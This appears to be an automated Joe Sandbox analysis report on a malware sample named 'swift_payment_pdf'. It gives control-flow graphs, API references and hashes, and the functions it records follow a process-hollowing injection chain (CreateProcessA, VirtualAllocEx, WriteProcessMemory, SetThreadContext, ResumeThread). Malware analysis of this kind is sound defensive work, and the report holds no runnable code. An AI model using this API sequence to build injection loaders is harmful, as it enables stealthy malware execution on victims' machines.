4edafca 25121->25122 25123 4edac4c 25121->25123 25208 4ed93e8 25122->25208 25212 4ed93e2 25122->25212 25216 4ed8ef8 25123->25216 25220 4ed8f00 25123->25220 25124 4edb413 25124->25124 25130 4edaa34 25129->25130 25224 4ed9808 25130->25224 25228 4ed9802 25130->25228 25135 4edac86 25134->25135 25137 4ed93e8 Wow64SetThreadContext 25135->25137 25138 4ed93e2 Wow64SetThreadContext 25135->25138 25136 4edaca1 25137->25136 25138->25136 25140 4edabf1 25139->25140 25142 4ed957a WriteProcessMemory 25140->25142 25143 4ed9580 WriteProcessMemory 25140->25143 25141 4edb154 25141->25062 25141->25141 25142->25141 25143->25141 25145 4edabf0 25144->25145 25147 4ed957a WriteProcessMemory 25145->25147 25148 4ed9580 WriteProcessMemory 25145->25148 25146 4edb154 25146->25062 25146->25146 25147->25146 25148->25146 25150 4edabcf 25149->25150 25152 4ed8ef8 ResumeThread 25150->25152 25153 4ed8f00 ResumeThread 25150->25153 25151 4edb413 25152->25151 25153->25151 25156 4ed957a WriteProcessMemory 25154->25156 25157 4ed9580 WriteProcessMemory 25154->25157 25155 4edaf02 25155->25062 25156->25155 25157->25155 25159 4edab73 25158->25159 25232 4ed94ba 25159->25232 25236 4ed94c0 25159->25236 25160 4edab91 25162 4ed957a WriteProcessMemory 25160->25162 25163 4ed9580 WriteProcessMemory 25160->25163 25161 4edb298 25162->25161 25163->25161 25167 4edb455 25166->25167 25172 4ed9668 ReadProcessMemory 25167->25172 25173 4ed9670 ReadProcessMemory 25167->25173 25168 4edb4a7 25168->25168 25169 4edaf26 25169->25168 25170 4ed9668 ReadProcessMemory 25169->25170 25171 4ed9670 ReadProcessMemory 25169->25171 25170->25169 25171->25169 25172->25169 25173->25169 25175 4edab73 25174->25175 25180 4ed94ba VirtualAllocEx 25175->25180 25181 4ed94c0 VirtualAllocEx 25175->25181 25176 4edab91 25178 4ed957a WriteProcessMemory 25176->25178 25179 4ed9580 WriteProcessMemory 25176->25179 25177 4edb298 25178->25177 25179->25177 25180->25176 25181->25176 25183 4edaa3e 25182->25183 25185 4ed9808 CreateProcessA 25183->25185 25186 4ed9802 CreateProcessA 25183->25186 25184 4edaac9 25184->25062 25185->25184 25186->25184 25188 4edac67 25187->25188 25190 4ed8ef8 ResumeThread 25188->25190 25191 4ed8f00 ResumeThread 25188->25191 25189 4edb413 25190->25189 25191->25189 25193 4ed9670 ReadProcessMemory 25192->25193 25195 4ed96ff 25193->25195 25195->25113 25197 4ed96bb ReadProcessMemory 25196->25197 25199 4ed96ff 25197->25199 25199->25113 25201 4ed95c8 WriteProcessMemory 25200->25201 25203 4ed961f 25201->25203 25203->25118 25205 4ed9580 WriteProcessMemory 25204->25205 25207 4ed961f 25205->25207 25207->25118 25209 4ed942d Wow64SetThreadContext 25208->25209 25211 4ed9475 25209->25211 25211->25123 25213 4ed93e8 Wow64SetThreadContext 25212->25213 25215 4ed9475 25213->25215 25215->25123 25217 4ed8f00 ResumeThread 25216->25217 25219 4ed8f71 25217->25219 25219->25124 25221 4ed8f40 ResumeThread 25220->25221 25223 4ed8f71 25221->25223 25223->25124 25225 4ed9891 CreateProcessA 25224->25225 25227 4ed9a53 25225->25227 25229 4ed9808 CreateProcessA 25228->25229 25231 4ed9a53 25229->25231 25233 4ed94c0 VirtualAllocEx 25232->25233 25235 4ed953d 25233->25235 25235->25160 25237 4ed9500 VirtualAllocEx 25236->25237 25239 4ed953d 25237->25239 25239->25160 25240 4edb768 25241 4edb8f3 25240->25241 25243 4edb78e 25240->25243 25243->25241 25244 4ed7d40 25243->25244 25245 4edb9e8 PostMessageW 25244->25245 25246 4edba54 25245->25246 25246->25243 25247 14cd040 25248 14cd086 GetCurrentProcess 25247->25248 25250 14cd0d8 GetCurrentThread 25248->25250 25251 14cd0d1 25248->25251 25252 14cd10e 25250->25252 25253 14cd115 GetCurrentProcess 25250->25253 25251->25250 25252->25253 25256 14cd14b 25253->25256 25254 14cd173 GetCurrentThreadId 25255 14cd1a4 25254->25255 25256->25254 25257 14cd690 DuplicateHandle 25258 14cd726 25257->25258

                  Executed Functions

                  Function 014CD030 Relevance: 6.1, APIs: 4, Instructions: 135threadCOMMON
                  Download Yara Rule

                  Control-flow Graph

                  • Executed
                  • Not Executed
                  control_flow_graph 294 14cd030-14cd0cf GetCurrentProcess 298 14cd0d8-14cd10c GetCurrentThread 294->298 299 14cd0d1-14cd0d7 294->299 300 14cd10e-14cd114 298->300 301 14cd115-14cd149 GetCurrentProcess 298->301 299->298 300->301 303 14cd14b-14cd151 301->303 304 14cd152-14cd16d call 14cd618 301->304 303->304 307 14cd173-14cd1a2 GetCurrentThreadId 304->307 308 14cd1ab-14cd20d 307->308 309 14cd1a4-14cd1aa 307->309 309->308
                  APIs
                  • GetCurrentProcess.KERNEL32 ref: 014CD0BE
                  • GetCurrentThread.KERNEL32 ref: 014CD0FB
                  • GetCurrentProcess.KERNEL32 ref: 014CD138
                  • GetCurrentThreadId.KERNEL32 ref: 014CD191
                  Memory Dump Source
                  • Source File: 00000000.00000002.1912228458.00000000014C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 014C0000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_14c0000_swift_payment_pdf.jbxd
                  Similarity
                  • API ID: Current$ProcessThread
                  • String ID:
                  • API String ID: 2063062207-0
                  • Opcode ID: a161cbaedfe9e61ec4d11a902b656454f78b67e83f7dda91dfe69a511339d3ae
                  • Instruction ID: 724f43e46e5e841db2d545b75f192e059785f3efc9ded0351302548d8fa23ed3
                  • Opcode Fuzzy Hash: a161cbaedfe9e61ec4d11a902b656454f78b67e83f7dda91dfe69a511339d3ae
                  • Instruction Fuzzy Hash: 155154B4D003498FDB54DFAAD548B9EBBF1AF88304F20846ED419A73A0DB749984CB65
                  Function 014CD040 Relevance: 6.1, APIs: 4, Instructions: 128threadCOMMON
                  Download Yara Rule

                  Control-flow Graph

                  • Executed
                  • Not Executed
                  control_flow_graph 316 14cd040-14cd0cf GetCurrentProcess 320 14cd0d8-14cd10c GetCurrentThread 316->320 321 14cd0d1-14cd0d7 316->321 322 14cd10e-14cd114 320->322 323 14cd115-14cd149 GetCurrentProcess 320->323 321->320 322->323 325 14cd14b-14cd151 323->325 326 14cd152-14cd16d call 14cd618 323->326 325->326 329 14cd173-14cd1a2 GetCurrentThreadId 326->329 330 14cd1ab-14cd20d 329->330 331 14cd1a4-14cd1aa 329->331 331->330
                  APIs
                  • GetCurrentProcess.KERNEL32 ref: 014CD0BE
                  • GetCurrentThread.KERNEL32 ref: 014CD0FB
                  • GetCurrentProcess.KERNEL32 ref: 014CD138
                  • GetCurrentThreadId.KERNEL32 ref: 014CD191
                  Memory Dump Source
                  • Source File: 00000000.00000002.1912228458.00000000014C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 014C0000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_14c0000_swift_payment_pdf.jbxd
                  Similarity
                  • API ID: Current$ProcessThread
                  • String ID:
                  • API String ID: 2063062207-0
                  • Opcode ID: e4412e6100f73db32eb2742f572c939c7049d46265feb9048cf56c93e3569ac0
                  • Instruction ID: b50eb08482f50072d3bf3059027474e6fc154c2f08495231f85bf20cc47c1d00
                  • Opcode Fuzzy Hash: e4412e6100f73db32eb2742f572c939c7049d46265feb9048cf56c93e3569ac0
                  • Instruction Fuzzy Hash: BB5166B4D003498FDB54DFAAD548B9EBBF1AF88314F20846ED409A73A0DB746984CB61
                  Function 04ED9802 Relevance: 1.7, APIs: 1, Instructions: 247processCOMMON
                  Download Yara Rule

                  Control-flow Graph

                  • Executed
                  • Not Executed
                  control_flow_graph 406 4ed9802-4ed989d 409 4ed989f-4ed98a9 406->409 410 4ed98d6-4ed98f6 406->410 409->410 411 4ed98ab-4ed98ad 409->411 415 4ed992f-4ed995e 410->415 416 4ed98f8-4ed9902 410->416 413 4ed98af-4ed98b9 411->413 414 4ed98d0-4ed98d3 411->414 417 4ed98bd-4ed98cc 413->417 418 4ed98bb 413->418 414->410 424 4ed9997-4ed9a51 CreateProcessA 415->424 425 4ed9960-4ed996a 415->425 416->415 420 4ed9904-4ed9906 416->420 417->417 419 4ed98ce 417->419 418->417 419->414 421 4ed9929-4ed992c 420->421 422 4ed9908-4ed9912 420->422 421->415 426 4ed9914 422->426 427 4ed9916-4ed9925 422->427 438 4ed9a5a-4ed9ae0 424->438 439 4ed9a53-4ed9a59 424->439 425->424 428 4ed996c-4ed996e 425->428 426->427 427->427 429 4ed9927 427->429 430 4ed9991-4ed9994 428->430 431 4ed9970-4ed997a 428->431 429->421 430->424 433 4ed997c 431->433 434 4ed997e-4ed998d 431->434 433->434 434->434 435 4ed998f 434->435 435->430 449 4ed9af0-4ed9af4 438->449 450 4ed9ae2-4ed9ae6 438->450 439->438 452 4ed9b04-4ed9b08 449->452 453 4ed9af6-4ed9afa 449->453 450->449 451 4ed9ae8 450->451 451->449 455 4ed9b18-4ed9b1c 452->455 456 4ed9b0a-4ed9b0e 452->456 453->452 454 4ed9afc 453->454 454->452 458 4ed9b2e-4ed9b35 455->458 459 4ed9b1e-4ed9b24 455->459 456->455 457 4ed9b10 456->457 457->455 460 4ed9b4c 458->460 461 4ed9b37-4ed9b46 458->461 459->458 463 4ed9b4d 460->463 461->460 463->463
                  APIs
                  • CreateProcessA.KERNELBASE(?,?,?,?,?,?,?,?,?,?), ref: 04ED9A3E
                  Memory Dump Source
                  • Source File: 00000000.00000002.1914752604.0000000004ED0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04ED0000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_4ed0000_swift_payment_pdf.jbxd
                  Similarity
                  • API ID: CreateProcess
                  • String ID:
                  • API String ID: 963392458-0
                  • Opcode ID: 233a89843cacbd01c0fe16c8df6a1d5da7c6d61acbce1ee2e5532d36ce38558b
                  • Instruction ID: a9c45b853e6e777b7be806bdfd6315f9a5d59d83cb5b90dd3fb5f21175091cdd
                  • Opcode Fuzzy Hash: 233a89843cacbd01c0fe16c8df6a1d5da7c6d61acbce1ee2e5532d36ce38558b
                  • Instruction Fuzzy Hash: C9918CB1D002199FEB20DF68CC417DDBBB2FF48314F149169E849A7285DB74A986CF91
                  Function 04ED9808 Relevance: 1.7, APIs: 1, Instructions: 243processCOMMON
                  Download Yara Rule

                  Control-flow Graph

                  • Executed
                  • Not Executed
                  control_flow_graph 464 4ed9808-4ed989d 466 4ed989f-4ed98a9 464->466 467 4ed98d6-4ed98f6 464->467 466->467 468 4ed98ab-4ed98ad 466->468 472 4ed992f-4ed995e 467->472 473 4ed98f8-4ed9902 467->473 470 4ed98af-4ed98b9 468->470 471 4ed98d0-4ed98d3 468->471 474 4ed98bd-4ed98cc 470->474 475 4ed98bb 470->475 471->467 481 4ed9997-4ed9a51 CreateProcessA 472->481 482 4ed9960-4ed996a 472->482 473->472 477 4ed9904-4ed9906 473->477 474->474 476 4ed98ce 474->476 475->474 476->471 478 4ed9929-4ed992c 477->478 479 4ed9908-4ed9912 477->479 478->472 483 4ed9914 479->483 484 4ed9916-4ed9925 479->484 495 4ed9a5a-4ed9ae0 481->495 496 4ed9a53-4ed9a59 481->496 482->481 485 4ed996c-4ed996e 482->485 483->484 484->484 486 4ed9927 484->486 487 4ed9991-4ed9994 485->487 488 4ed9970-4ed997a 485->488 486->478 487->481 490 4ed997c 488->490 491 4ed997e-4ed998d 488->491 490->491 491->491 492 4ed998f 491->492 492->487 506 4ed9af0-4ed9af4 495->506 507 4ed9ae2-4ed9ae6 495->507 496->495 509 4ed9b04-4ed9b08 506->509 510 4ed9af6-4ed9afa 506->510 507->506 508 4ed9ae8 507->508 508->506 512 4ed9b18-4ed9b1c 509->512 513 4ed9b0a-4ed9b0e 509->513 510->509 511 4ed9afc 510->511 511->509 515 4ed9b2e-4ed9b35 512->515 516 4ed9b1e-4ed9b24 512->516 513->512 514 4ed9b10 513->514 514->512 517 4ed9b4c 515->517 518 4ed9b37-4ed9b46 515->518 516->515 520 4ed9b4d 517->520 518->517 520->520
                  APIs
                  • CreateProcessA.KERNELBASE(?,?,?,?,?,?,?,?,?,?), ref: 04ED9A3E
                  Memory Dump Source
                  • Source File: 00000000.00000002.1914752604.0000000004ED0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04ED0000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_4ed0000_swift_payment_pdf.jbxd
                  Similarity
                  • API ID: CreateProcess
                  • String ID:
                  • API String ID: 963392458-0
                  • Opcode ID: 503c5f7891a3168a1e389e93db09727e5c5c0a2522c49a5d7e7faa4147d26ffb
                  • Instruction ID: ce45400ca8063711ba38ab928b6c2011cd98872b7b9dc9e600bc6c4cb5229095
                  • Opcode Fuzzy Hash: 503c5f7891a3168a1e389e93db09727e5c5c0a2522c49a5d7e7faa4147d26ffb
                  • Instruction Fuzzy Hash: 4A917CB1D002199FEB20DF68CC417DDBBB2FF48314F149169E849A7285DB74A986CF91
                  Function 014CADA8 Relevance: 1.7, APIs: 1, Instructions: 207COMMON
                  Download Yara Rule

                  Control-flow Graph

                  • Executed
                  • Not Executed
                  control_flow_graph 521 14cada8-14cadb7 522 14cadb9-14cadc6 call 14ca0cc 521->522 523 14cade3-14cade7 521->523 530 14caddc 522->530 531 14cadc8 522->531 524 14cade9-14cadf3 523->524 525 14cadfb-14cae3c 523->525 524->525 532 14cae3e-14cae46 525->532 533 14cae49-14cae57 525->533 530->523 578 14cadce call 14cb040 531->578 579 14cadce call 14cb031 531->579 532->533 535 14cae59-14cae5e 533->535 536 14cae7b-14cae7d 533->536 534 14cadd4-14cadd6 534->530 537 14caf18-14caf94 534->537 539 14cae69 535->539 540 14cae60-14cae67 call 14ca0d8 535->540 538 14cae80-14cae87 536->538 571 14caf96-14cafbe 537->571 572 14cafc0-14cafd8 537->572 542 14cae89-14cae91 538->542 543 14cae94-14cae9b 538->543 541 14cae6b-14cae79 539->541 540->541 541->538 542->543 546 14cae9d-14caea5 543->546 547 14caea8-14caeaa call 14ca0e8 543->547 546->547 550 14caeaf-14caeb1 547->550 552 14caebe-14caec3 550->552 553 14caeb3-14caebb 550->553 554 14caec5-14caecc 552->554 555 14caee1-14caeee 552->555 553->552 554->555 557 14caece-14caede call 14ca0f8 call 14ca108 554->557 562 14caef0-14caf0e 555->562 563 14caf11-14caf17 555->563 557->555 562->563 571->572 573 14cafda-14cafdd 572->573 574 14cafe0-14cb00b GetModuleHandleW 572->574 573->574 575 14cb00d-14cb013 574->575 576 14cb014-14cb028 574->576 575->576 578->534 579->534
                  APIs
                  • GetModuleHandleW.KERNELBASE(00000000), ref: 014CAFFE
                  Memory Dump Source
                  • Source File: 00000000.00000002.1912228458.00000000014C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 014C0000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_14c0000_swift_payment_pdf.jbxd
                  Similarity
                  • API ID: HandleModule
                  • String ID:
                  • API String ID: 4139908857-0
                  • Opcode ID: 53ef008237b47d66a95899f1a2e0e35595ee07103ead90aabf69971b13b59728
                  • Instruction ID: 031fd312aae9c32bbddc7c8f9ffa10e0794727123e516aaec407db8c81955a15
                  • Opcode Fuzzy Hash: 53ef008237b47d66a95899f1a2e0e35595ee07103ead90aabf69971b13b59728
                  • Instruction Fuzzy Hash: 5D8158B4A00B098FD764DF6AD04475ABBF1FF88704F10892ED18A97B60E735E846CB90
                  Function 014C590D Relevance: 1.6, APIs: 1, Instructions: 98COMMON
                  Download Yara Rule

                  Control-flow Graph

                  • Executed
                  • Not Executed
                  control_flow_graph 580 14c590d-14c5916 581 14c5918-14c59d9 CreateActCtxA 580->581 583 14c59db-14c59e1 581->583 584 14c59e2-14c5a3c 581->584 583->584 591 14c5a3e-14c5a41 584->591 592 14c5a4b-14c5a4f 584->592 591->592 593 14c5a60 592->593 594 14c5a51-14c5a5d 592->594 596 14c5a61 593->596 594->593 596->596
                  APIs
                  • CreateActCtxA.KERNEL32(?), ref: 014C59C9
                  Memory Dump Source
                  • Source File: 00000000.00000002.1912228458.00000000014C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 014C0000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_14c0000_swift_payment_pdf.jbxd
                  Similarity
                  • API ID: Create
                  • String ID:
                  • API String ID: 2289755597-0
                  • Opcode ID: ddfb3d14b9b26a895f268964ca2858b7c74d444b7a82dc010eae5f13cb7533bb
                  • Instruction ID: 2953df27401d46195d581b540550bba596a2af19e8a18f7b3d9435325e37909b
                  • Opcode Fuzzy Hash: ddfb3d14b9b26a895f268964ca2858b7c74d444b7a82dc010eae5f13cb7533bb
                  • Instruction Fuzzy Hash: C841D1B4D0071DCBDB24DFAAC884BCEBBB5BF49704F20806AD409AB251DB756945CF90
                  Function 014C44C4 Relevance: 1.6, APIs: 1, Instructions: 96COMMON
                  Download Yara Rule

                  Control-flow Graph

                  • Executed
                  • Not Executed
                  control_flow_graph 597 14c44c4-14c59d9 CreateActCtxA 600 14c59db-14c59e1 597->600 601 14c59e2-14c5a3c 597->601 600->601 608 14c5a3e-14c5a41 601->608 609 14c5a4b-14c5a4f 601->609 608->609 610 14c5a60 609->610 611 14c5a51-14c5a5d 609->611 613 14c5a61 610->613 611->610 613->613
                  APIs
                  • CreateActCtxA.KERNEL32(?), ref: 014C59C9
                  Memory Dump Source
                  • Source File: 00000000.00000002.1912228458.00000000014C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 014C0000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_14c0000_swift_payment_pdf.jbxd
                  Similarity
                  • API ID: Create
                  • String ID:
                  • API String ID: 2289755597-0
                  • Opcode ID: f3094e8f7146fdcf71cde5a349d09f15e5b09f4755f2e0cebdc5781658faae0f
                  • Instruction ID: c070e3cc056ef3accd92822577e9acaaee57ee26541a20247d4ef141984722b0
                  • Opcode Fuzzy Hash: f3094e8f7146fdcf71cde5a349d09f15e5b09f4755f2e0cebdc5781658faae0f
                  • Instruction Fuzzy Hash: 3541F2B4D0071DCBDB24DFAAC884BDEBBB5BF49704F20805AD409AB251DB75A945CF90
                  Function 04ED957A Relevance: 1.6, APIs: 1, Instructions: 74injectionCOMMON
                  Download Yara Rule

                  Control-flow Graph

                  • Executed
                  • Not Executed
                  control_flow_graph 614 4ed957a-4ed95ce 617 4ed95de-4ed961d WriteProcessMemory 614->617 618 4ed95d0-4ed95dc 614->618 620 4ed961f-4ed9625 617->620 621 4ed9626-4ed9656 617->621 618->617 620->621
                  APIs
                  • WriteProcessMemory.KERNELBASE(?,?,00000000,?,?), ref: 04ED9610
                  Memory Dump Source
                  • Source File: 00000000.00000002.1914752604.0000000004ED0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04ED0000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_4ed0000_swift_payment_pdf.jbxd
                  Similarity
                  • API ID: MemoryProcessWrite
                  • String ID:
                  • API String ID: 3559483778-0
                  • Opcode ID: 1780aae03d703de3f05625f76342235e1b6604fafe8336cb0635e5db57e6b6aa
                  • Instruction ID: 80b46db0d3ad51225a07ef2de546c75e8a6a03e7bfc6dc1dc9ac5bda045c269e
                  • Opcode Fuzzy Hash: 1780aae03d703de3f05625f76342235e1b6604fafe8336cb0635e5db57e6b6aa
                  • Instruction Fuzzy Hash: 81217AB5D003099FCB10DFAAC881BDEBBF5FF48314F10842AE518A7241C778A945CBA0
                  Function 04ED9580 Relevance: 1.6, APIs: 1, Instructions: 69injectionCOMMON
                  Download Yara Rule

                  Control-flow Graph

                  • Executed
                  • Not Executed
                  control_flow_graph 625 4ed9580-4ed95ce 627 4ed95de-4ed961d WriteProcessMemory 625->627 628 4ed95d0-4ed95dc 625->628 630 4ed961f-4ed9625 627->630 631 4ed9626-4ed9656 627->631 628->627 630->631
                  APIs
                  • WriteProcessMemory.KERNELBASE(?,?,00000000,?,?), ref: 04ED9610
                  Memory Dump Source
                  • Source File: 00000000.00000002.1914752604.0000000004ED0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04ED0000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_4ed0000_swift_payment_pdf.jbxd
                  Similarity
                  • API ID: MemoryProcessWrite
                  • String ID:
                  • API String ID: 3559483778-0
                  • Opcode ID: 53c978301ba784de35c801975389787cf47f9022e6d58d2e8bebd89bf80e8a56
                  • Instruction ID: 023de6e307170f69ec4fe1ec3f02e2544316f884a6977ba1bbe77fa9569546fa
                  • Opcode Fuzzy Hash: 53c978301ba784de35c801975389787cf47f9022e6d58d2e8bebd89bf80e8a56
                  • Instruction Fuzzy Hash: EC2169B59003099FCB10DFAAC885BDEBBF5FF48310F10842AE959A7241C778A945CBA4
                  Function 04ED9668 Relevance: 1.6, APIs: 1, Instructions: 69COMMON
                  Download Yara Rule

                  Control-flow Graph

                  • Executed
                  • Not Executed
                  control_flow_graph 635 4ed9668-4ed96fd ReadProcessMemory 639 4ed96ff-4ed9705 635->639 640 4ed9706-4ed9736 635->640 639->640
                  APIs
                  • ReadProcessMemory.KERNELBASE(?,?,?,?,?), ref: 04ED96F0
                  Memory Dump Source
                  • Source File: 00000000.00000002.1914752604.0000000004ED0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04ED0000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_4ed0000_swift_payment_pdf.jbxd
                  Similarity
                  • API ID: MemoryProcessRead
                  • String ID:
                  • API String ID: 1726664587-0
                  • Opcode ID: cde33ff8e448614dd0f2a39030df5409feeb622abf69bb93c49b8ceaf67aea3c
                  • Instruction ID: 6f3662d0eff38c3d591e1078c64715a9b7a99e03be8fb1fd5b5466c14ddd8807
                  • Opcode Fuzzy Hash: cde33ff8e448614dd0f2a39030df5409feeb622abf69bb93c49b8ceaf67aea3c
                  • Instruction Fuzzy Hash: 2F214AB5D003499FDB10DFAAC881ADEFBF5FF48320F508429E559A3241C738A945CBA1
                  Function 04ED93E2 Relevance: 1.6, APIs: 1, Instructions: 68threadCOMMON
                  Download Yara Rule

                  Control-flow Graph

                  • Executed
                  • Not Executed
                  control_flow_graph 644 4ed93e2-4ed9433 647 4ed9435-4ed9441 644->647 648 4ed9443-4ed9473 Wow64SetThreadContext 644->648 647->648 650 4ed947c-4ed94ac 648->650 651 4ed9475-4ed947b 648->651 651->650
                  APIs
                  • Wow64SetThreadContext.KERNEL32(?,00000000), ref: 04ED9466
                  Memory Dump Source
                  • Source File: 00000000.00000002.1914752604.0000000004ED0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04ED0000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_4ed0000_swift_payment_pdf.jbxd
                  Similarity
                  • API ID: ContextThreadWow64
                  • String ID:
                  • API String ID: 983334009-0
                  • Opcode ID: 2c3c6facd7b5e884f7172e92e4a1f0812e4aa2011ba79023df806d284a6207bf
                  • Instruction ID: 9633d6e536094d1b5c600df22454df7e1f98b4dbc5523d19678d876fbd8ecec3
                  • Opcode Fuzzy Hash: 2c3c6facd7b5e884f7172e92e4a1f0812e4aa2011ba79023df806d284a6207bf
                  • Instruction Fuzzy Hash: 91216AB5D003098FDB10DFAAC8857EEBBF5EF48324F548429D459A7242CB78A945CFA1
                  Function 04ED9670 Relevance: 1.6, APIs: 1, Instructions: 63COMMON
                  Download Yara Rule
                  APIs
                  • ReadProcessMemory.KERNELBASE(?,?,?,?,?), ref: 04ED96F0
                  Memory Dump Source
                  • Source File: 00000000.00000002.1914752604.0000000004ED0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04ED0000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_4ed0000_swift_payment_pdf.jbxd
                  Similarity
                  • API ID: MemoryProcessRead
                  • String ID:
                  • API String ID: 1726664587-0
                  • Opcode ID: ac9bb90d791d798527c665cce62459afe4dc9b30b38040c2b02048fad7f4cd49
                  • Instruction ID: 5cbf19d8c37a2bac303e0e6033bc3395722f24aee49b885e82205134dfc3499e
                  • Opcode Fuzzy Hash: ac9bb90d791d798527c665cce62459afe4dc9b30b38040c2b02048fad7f4cd49
                  • Instruction Fuzzy Hash: 902159B1C003499FCB10DFAAC881ADEFBF5FF48310F108429E559A3241C734A900CBA1
                  Function 04ED93E8 Relevance: 1.6, APIs: 1, Instructions: 63threadCOMMON
                  Download Yara Rule

                  Control-flow Graph

                  • Executed
                  • Not Executed
                  control_flow_graph 655 4ed93e8-4ed9433 657 4ed9435-4ed9441 655->657 658 4ed9443-4ed9473 Wow64SetThreadContext 655->658 657->658 660 4ed947c-4ed94ac 658->660 661 4ed9475-4ed947b 658->661 661->660
                  APIs
                  • Wow64SetThreadContext.KERNEL32(?,00000000), ref: 04ED9466
                  Memory Dump Source
                  • Source File: 00000000.00000002.1914752604.0000000004ED0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04ED0000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_4ed0000_swift_payment_pdf.jbxd
                  Similarity
                  • API ID: ContextThreadWow64
                  • String ID:
                  • API String ID: 983334009-0
                  • Opcode ID: c04c6ddc374e5bd6cfa796f67a5f404129fe2cf835203abd2add36edab912642
                  • Instruction ID: 41df77503d7ea02f9acf530dd026a449f1151fd0a87869e87bd44f791ffc586b
                  • Opcode Fuzzy Hash: c04c6ddc374e5bd6cfa796f67a5f404129fe2cf835203abd2add36edab912642
                  • Instruction Fuzzy Hash: 5C2138B59003098FDB10DFAAC8857EEBBF4EF48324F148429D559A7242CB78A945CFA5
                  Function 014CD690 Relevance: 1.6, APIs: 1, Instructions: 62COMMON
                  Download Yara Rule
                  APIs
                  • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?), ref: 014CD717
                  Memory Dump Source
                  • Source File: 00000000.00000002.1912228458.00000000014C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 014C0000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_14c0000_swift_payment_pdf.jbxd
                  Similarity
                  • API ID: DuplicateHandle
                  • String ID:
                  • API String ID: 3793708945-0
                  • Opcode ID: cd909dcba9909e6854f18c963cec9822541b11476ab4483af1613cc29955cd7e
                  • Instruction ID: 7f47fc21f002bbc3c2e3bbaf161e006ae1b47272e64392b2e531123baeb38f65
                  • Opcode Fuzzy Hash: cd909dcba9909e6854f18c963cec9822541b11476ab4483af1613cc29955cd7e
                  • Instruction Fuzzy Hash: DD21E3B99002489FDB10CF9AD984ADEBBF4EB48310F14801AE958A3351C374A954CFA1
                  Function 014CD689 Relevance: 1.6, APIs: 1, Instructions: 61COMMON
                  Download Yara Rule
                  APIs
                  • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?), ref: 014CD717
                  Memory Dump Source
                  • Source File: 00000000.00000002.1912228458.00000000014C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 014C0000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_14c0000_swift_payment_pdf.jbxd
                  Similarity
                  • API ID: DuplicateHandle
                  • String ID:
                  • API String ID: 3793708945-0
                  • Opcode ID: 032e55bd7b68bf1a165cab0261066882e9ca9f3724bff74eeca8dd274acbd509
                  • Instruction ID: 837808d4216625f4520a809ad08084825ce043a2734692b684ce3941c18fc664
                  • Opcode Fuzzy Hash: 032e55bd7b68bf1a165cab0261066882e9ca9f3724bff74eeca8dd274acbd509
                  • Instruction Fuzzy Hash: 9C21E0B9900248DFDB10CFA9D984ADEBBF5EB48314F14842AE958A3251C378A954CFA1
                  Function 04ED94BA Relevance: 1.6, APIs: 1, Instructions: 57memoryCOMMON
                  Download Yara Rule
                  APIs
                  • VirtualAllocEx.KERNELBASE(?,?,?,?,?), ref: 04ED952E
                  Memory Dump Source
                  • Source File: 00000000.00000002.1914752604.0000000004ED0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04ED0000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_4ed0000_swift_payment_pdf.jbxd
                  Similarity
                  • API ID: AllocVirtual
                  • String ID:
                  • API String ID: 4275171209-0
                  • Opcode ID: 3125a67738d5b92859507355875efa8669944d8c90657fcc7468d84600da9b5f
                  • Instruction ID: f00842e3f4174be73f8277d87ddcfb631e5d170c6b049d976f8532eab3e12f11
                  • Opcode Fuzzy Hash: 3125a67738d5b92859507355875efa8669944d8c90657fcc7468d84600da9b5f
                  • Instruction Fuzzy Hash: AE1186B69003099FCB10DFAAD845AEFBFF5EF88320F108419E519A7240CB35A945CBA1
                  Function 014CA130 Relevance: 1.6, APIs: 1, Instructions: 55libraryCOMMON
                  Download Yara Rule
                  APIs
                  • LoadLibraryExW.KERNELBASE(00000000,00000000,?,?,?,?,00000000,?,014CB079,00000800,00000000,00000000), ref: 014CB28A
                  Memory Dump Source
                  • Source File: 00000000.00000002.1912228458.00000000014C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 014C0000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_14c0000_swift_payment_pdf.jbxd
                  Similarity
                  • API ID: LibraryLoad
                  • String ID:
                  • API String ID: 1029625771-0
                  • Opcode ID: d3b46b7759051dfed7ff73e6ead6386e55e0045d0ac8cc4fca725bff4f6857af
                  • Instruction ID: 84f69a989d41fd6ffdcd58d5c7f3947d2eeaa8aa9ce084de011524e7f588d3bf
